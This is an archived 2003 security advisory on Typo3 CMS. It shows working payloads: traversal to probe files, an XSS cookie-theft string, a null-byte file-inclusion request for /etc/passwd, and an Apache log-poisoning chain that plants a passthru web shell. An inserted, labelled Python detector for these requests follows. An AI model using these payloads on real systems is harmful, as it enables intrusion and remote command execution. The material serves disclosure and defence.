1st Mar 2003 [SBWID-6033]
COMMAND
	Typo3 remote file disclosure, command execution ...
SYSTEMS AFFECTED
	 Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too)
	 Tested Platforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2
PROBLEM
	In Martin Eiszner's [[email protected]] advisory:
	
	 http://www.websec.org/adv/typo3.html
	
	TYPO3 is a free Open Source content management system for enterprise
	purposes on the web and in intranets. It offers full flexibility and
	extendability while featuring an accomplished set of ready-made
	interfaces, functions and modules.
	
	0) CLIENT-SIDE DATA-OBFUSCATION
	
	Form fields are obfuscated using client-side JavaScript routines:
	after the fields are joined, a JavaScript routine creates MD5 hashes and
	submits the form.
	Examples: index.php (account data), showpic.php (name checksum).
	The attached Perl scripts (typo.pl/showpic.pl) demonstrate how to
	circumvent this protection.
	
	1) PATH-DISCLOSURE
	
	Several test, class and library scripts can be found within the webroot.
	Some of them can be forced to produce runtime errors and output their
	physical path.
	Example: /fileadmin/include_test.php
	
	2) PROOF OF FILE-EXISTENCE
	
	"showpic.php" and "thumbs.php" allow an attacker to check the existence
	of arbitrary files.
	Combined with file-enumeration methods it is possible to reconstruct
	parts of the directory and filesystem structure.
	Example of how to check for existing files with the attached Perl script
	"showpic.pl":
	
	---*---
	sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
	../../../../../../../../../../etc/hosts exists
	---*---
	
	
	3) CROSS SITE SCRIPTING / COOKIE-THEFT
	
	All system and login errors are saved in the TYPO3 database, and
	administrators can view all the erroneous data.
	Since this data is not checked for XSS content, it is possible to
	include client-side script (JavaScript) tags in these entries.
	Every time the admins view their logs these scripts will be run in the
	admin's web browser, which leads to a typical XSS bug,
	thus making it possible to steal the admin's cookies or have him open a
	new user account without his knowledge.
	Example with the attached "typo.pl" Perl script:
	
	---*---
	sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
	---*---
	
	Viewing the log files will execute the script.
	
	4) ARBITRARY FILE-RETRIEVAL
	
	The "dev/translations.php" script does not check the ONLY parameter
	for malicious values.
	A relative path combined with a null byte leads to the inclusion of the
	given file.
	Example HTTP request:
	
	---*---
	GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
	---*---
	
	
	5) ARBITRARY COMMAND EXECUTION
	
	Extends vulnerability number 4):
	if the included file contains PHP source code it will be executed, thus
	allowing an attacker to execute operating-system commands and, in the
	long run, escalate his privileges.
	Example:
	A file for placing our malicious PHP source is needed. If there is no
	file we have write access to, we can still use the web server's log files.
	The following HTTP request:
	
	---cut---
	http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
	---cut---
	
	creates this entry:
	
	---cut---
	[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c)?>' >> ./x.php` ?>
	---cut---
	
	in a typical Apache error_log file.
	Using the method discussed under 4), the following HTTP request:
	
	---cut---
	http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
	---cut---
	
	will include the Apache error_log in our output and execute our
	PHP commands. As a result we will find x.php in our "/dev" directory.
	x.php:
	
	---cut---
	<?passthru($c)?>
	---cut---
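	From the defender's side, the requests in sections 2), 4) and 5) leave distinctive traces in the Apache access log: traversal or a null byte in the ONLY parameter, traversal in the file name passed to showpic.php/thumbs.php, and a PHP open tag in a requested path (the log-poisoning step). The following detector is an added example, not part of the original advisory; it assumes the combined log format, and the query parameter name "file" for showpic.php/thumbs.php is an assumption since the advisory text does not name it. The log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common/combined log line: client, timestamp, request line, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Script name -> query parameter carrying a file name. ONLY is from the
# advisory; "file" for showpic.php/thumbs.php is an assumption.
WATCHED = {"translations.php": "ONLY", "showpic.php": "file", "thumbs.php": "file"}


def classify(request_target):
    """Return the indicator names found in one request target (path?query)."""
    hits = []
    url = urlsplit(request_target)
    decoded_path = unquote(url.path)
    # A PHP open tag in the requested path: attempt to plant code in error_log
    if "<?" in decoded_path:
        hits.append("php-tag-in-path")
    script = decoded_path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param:
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = unquote(value)  # parse_qs decoded once; catch double encoding
            if "\x00" in value:
                hits.append(f"{script}:null-byte")
            if "../" in value or "..\\" in value:
                hits.append(f"{script}:traversal")
    return hits


def scan(lines):
    """Return (client, decoded script path, indicators) per suspicious line."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, _method, target, _status = match.groups()
        hits = classify(target)
        if hits:
            findings.append((client, unquote(urlsplit(target).path), hits))
    return findings


# Constructed sample lines (not real traffic) mirroring the advisory's requests
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jan/2003:19:40:01 +0100] "GET /typo3/index.php HTTP/1.0" 200 1422',
    '10.0.0.9 - - [14/Jan/2003:19:42:53 +0100] "GET /<%3f%20%60echo%20x%60%20%3f> HTTP/1.0" 404 211',
    '10.0.0.9 - - [14/Jan/2003:19:43:10 +0100] "GET /typo3/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.0" 200 980',
    '10.0.0.9 - - [14/Jan/2003:19:44:02 +0100] "GET /typo3/showpic.php?file=../../../../etc/hosts&md5=0 HTTP/1.0" 200 120',
]
```

	Running scan(SAMPLE_LOG) flags the last three lines; the 404 on the PHP-tag request is what the advisory relies on, since that is what writes the tag into error_log.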
	
	
	6) SCRIPTS AND DIRECTORIES IN WEBROOT
	
	A couple of scripts, libraries, files and directories can be found
	within TYPO3's webroot.
	
	"/install" is improperly protected and vulnerable to brute-force attacks.
	"/fileadmin" directory reveals log files and demo scripts.
	"/typo3conf" directory contains localconf.php, database.sql and other sensitive files.
	
	 Remarks
	 =======
	The serious vulnerabilities rely on the "/dev" (developer?) directory.
	Scripts within this directory can be found in many/most
	production environments!
	
SOLUTION
	Install the new version: http://typo3.org/1331.0.html
	or
	 1) remove "/install" directory
	 2) remove "/dev" directory
	 3) Choose strong administrator-passwords
	 4) showpic.php and thumbs.php must be patched.
	 5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"